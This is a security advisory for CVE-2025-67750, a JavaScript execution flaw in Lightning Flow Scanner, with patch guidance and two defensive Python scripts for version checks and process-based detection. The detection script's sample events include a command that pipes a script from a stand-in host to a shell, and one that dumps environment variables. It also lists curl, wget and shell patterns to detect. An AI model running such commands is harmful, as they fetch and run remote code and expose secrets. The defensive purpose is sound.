CVE-2025-67750
📋 TL;DR
CVE-2025-67750 is a remote code execution vulnerability in Lightning Flow Scanner where maliciously crafted flow metadata files can execute arbitrary JavaScript during scanning. The vulnerability affects developers using the CLI plugin, VS Code Extension, or GitHub Action versions 6.10.5 and below, potentially compromising developer machines, CI runners, or editor environments.
💻 Affected Systems
- Lightning Flow Scanner CLI plugin
- Lightning Flow Scanner VS Code Extension
- Lightning Flow Scanner GitHub Action
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of developer workstations or CI/CD infrastructure leading to data theft, lateral movement, and supply chain attacks.
Likely Case
Malicious code execution on developer machines scanning untrusted flow metadata, potentially stealing credentials or sensitive data.
If Mitigated
Limited impact if scanning only trusted metadata sources with proper network segmentation and least privilege.
🎯 Exploit Status
Exploitation requires the victim to scan a malicious flow metadata file, which could be delivered via repositories, shared files, or CI/CD pipelines.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.10.6
Vendor Advisory: https://github.com/Flow-Scanner/lightning-flow-scanner/security/advisories/GHSA-55jh-84jv-8mx8
Restart Required: No
Instructions:
1. Update Lightning Flow Scanner to version 6.10.6 or higher.
2. For CLI: npm update @flowscanner/cli
3. For VS Code: update the extension via the marketplace.
4. For GitHub Action: update the workflow to use core-v6.10.6 or later.
🔧 Temporary Workarounds
- Disable APIVersion rule (applies to: all): Temporarily disable the vulnerable rule that uses new Function() evaluation. Add 'APIVersion' to disabledRules in scanner configuration.
- Scan only trusted sources (applies to: all): Restrict scanning to verified, trusted flow metadata files.
🧯 If You Can't Patch
- Isolate scanning environments with network segmentation and minimal privileges
- Implement strict source control policies to prevent untrusted flow metadata
🔍 How to Verify
Check if Vulnerable:
Check current version: For CLI run 'flow-scanner --version', for VS Code check extension version, for GitHub Action check workflow YAML.
Check Version:
flow-scanner --version
Verify Fix Applied:
Confirm version is 6.10.6 or higher using the same commands.
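The version checks above can be automated across the three delivery channels. The following Python script is an added example, not code from the advisory or the Lightning Flow Scanner project: it extracts an X.Y.Z version from CLI output or from a core-vX.Y.Z action tag and compares it numerically against the 6.10.6 fix version, so that 6.9.20 is correctly treated as older than 6.10.6 (a plain string comparison would get that wrong). The CLI output line and the workflow snippet are constructed sample input, and the action path EXAMPLE-ORG/flow-scanner-action is a placeholder, not the real action name.

```python
import re
from typing import List, Optional, Tuple

# Fixed version from the advisory: 6.10.6 and later are not affected.
FIXED_VERSION = (6, 10, 6)

# Constructed sample input (not real tool output): a CLI banner and a workflow file.
SAMPLE_CLI_OUTPUT = "flow-scanner/6.10.5 linux-x64 node-v20.11.0"
SAMPLE_WORKFLOW = """
name: scan
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: EXAMPLE-ORG/flow-scanner-action@core-v6.10.5   # placeholder action path, vulnerable tag
      - uses: EXAMPLE-ORG/flow-scanner-action@core-v6.10.6   # placeholder action path, fixed tag
"""


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Return the first X.Y.Z found in text as an int tuple, or None if there is none."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None
    major, minor, patch = (int(part) for part in m.groups())
    return (major, minor, patch)


def is_vulnerable_version(version: Tuple[int, int, int]) -> bool:
    """True for 6.10.5 and below; tuple comparison is numeric per component."""
    return version < FIXED_VERSION


def check_cli_output(output: str) -> Optional[bool]:
    """Classify 'flow-scanner --version' output: True = vulnerable, False = fixed, None = unparseable."""
    version = parse_version(output)
    return None if version is None else is_vulnerable_version(version)


def find_vulnerable_action_refs(workflow_yaml: str) -> List[str]:
    """Return every 'uses:' reference pinned to a core-vX.Y.Z tag older than the fix."""
    hits = []
    for m in re.finditer(r"uses:\s*([^\s#]+@core-v(\d+\.\d+\.\d+))", workflow_yaml):
        ref, version = m.group(1), parse_version(m.group(2))
        if version is not None and is_vulnerable_version(version):
            hits.append(ref)
    return hits


if __name__ == "__main__":
    print("CLI vulnerable:", check_cli_output(SAMPLE_CLI_OUTPUT))
    print("Vulnerable workflow refs:", find_vulnerable_action_refs(SAMPLE_WORKFLOW))
```

In practice, feed `check_cli_output` the captured output of `flow-scanner --version` and run `find_vulnerable_action_refs` over each file under `.github/workflows/`; a workflow that references the action by a branch or a floating tag rather than a core-vX.Y.Z tag will not be reported and needs a manual look.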
📡 Detection & Monitoring
Log Indicators:
- Unexpected JavaScript execution errors in scanner logs
- Unusual process creation during flow scanning
Network Indicators:
- Unexpected outbound connections from scanning environments
SIEM Query:
Process creation where parent process contains 'flow-scanner' AND command line contains suspicious JavaScript patterns
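The SIEM query above expressed as runnable detection logic, added here as an example and not taken from the advisory or any vendor content. It reads process-creation events as JSON lines, flags a child process whose parent is the scanner and whose command line matches a small set of suspicious patterns (inline script evaluation, shell -c wrappers, download tools), and skips malformed lines. The event field names (parent_image, parent_cmdline, image, cmdline) and the five sample events are constructed for this example; map the fields to your EDR or audit log schema and tune the patterns to your environment.

```python
import json
import re
from typing import Dict, List

# Constructed patterns for "suspicious" child command lines under the scanner process.
# These are starting points, not a vendor-supplied rule set.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bnode\b.*\s(-e|--eval)\s", re.I),   # inline JavaScript evaluation
    re.compile(r"\b(bash|sh|zsh)\s+-c\b", re.I),       # shell wrapper spawned from the scanner
    re.compile(r"\b(curl|wget)\b", re.I),              # download tooling from a scan
]

# Constructed sample telemetry (JSON lines); not real log output.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"ts": "2025-12-01T10:15:02Z", "host": "ci-runner-01",
                "parent_image": "/usr/bin/node",
                "parent_cmdline": "node /usr/local/bin/flow-scanner --directory force-app",
                "image": "/bin/sh",
                "cmdline": "sh -c 'curl http://203.0.113.10/s.sh | sh'"}),
    json.dumps({"ts": "2025-12-01T10:15:03Z", "host": "ci-runner-01",
                "parent_image": "/usr/bin/node",
                "parent_cmdline": "node /usr/local/bin/flow-scanner --directory force-app",
                "image": "/usr/bin/git",
                "cmdline": "git rev-parse --show-toplevel"}),
    "this line is not JSON and must be skipped",
    json.dumps({"ts": "2025-12-01T11:02:44Z", "host": "dev-laptop-07",
                "parent_image": "/usr/local/bin/node",
                "parent_cmdline": "node /home/dev/.npm-global/bin/flow-scanner",
                "image": "/usr/local/bin/node",
                "cmdline": 'node -e "console.log(process.env)"'}),
    json.dumps({"ts": "2025-12-01T11:05:10Z", "host": "dev-laptop-07",
                "parent_image": "/usr/bin/bash",
                "parent_cmdline": "bash deploy.sh",
                "image": "/usr/bin/curl",
                "cmdline": "curl https://registry.example.test/pkg.tgz"}),
])


def matches_siem_rule(event: Dict) -> bool:
    """Parent must be the scanner AND the child command line must hit a suspicious pattern."""
    parent = f"{event.get('parent_image', '')} {event.get('parent_cmdline', '')}".lower()
    if "flow-scanner" not in parent:
        return False
    cmdline = event.get("cmdline", "")
    return any(pattern.search(cmdline) for pattern in SUSPICIOUS_PATTERNS)


def scan_events(jsonl: str) -> List[Dict]:
    """Run the rule over JSON-lines telemetry and return a compact alert per matching event."""
    alerts = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry is skipped, not treated as an alert
        if matches_siem_rule(event):
            alerts.append({"ts": event.get("ts"), "host": event.get("host"),
                           "cmdline": event.get("cmdline")})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"ALERT {alert['ts']} {alert['host']}: {alert['cmdline']}")
```

Of the four well-formed events, only the two whose parent is the scanner and whose child runs a shell-with-curl or an inline `node -e` are reported; the `git` child of the scanner and the `curl` spawned by an unrelated `bash deploy.sh` are not. Because the vulnerable path executes JavaScript inside the scanner process itself, the child-process rule only sees what that code goes on to spawn; pair it with the outbound-connection indicator above for scans that never create a child process.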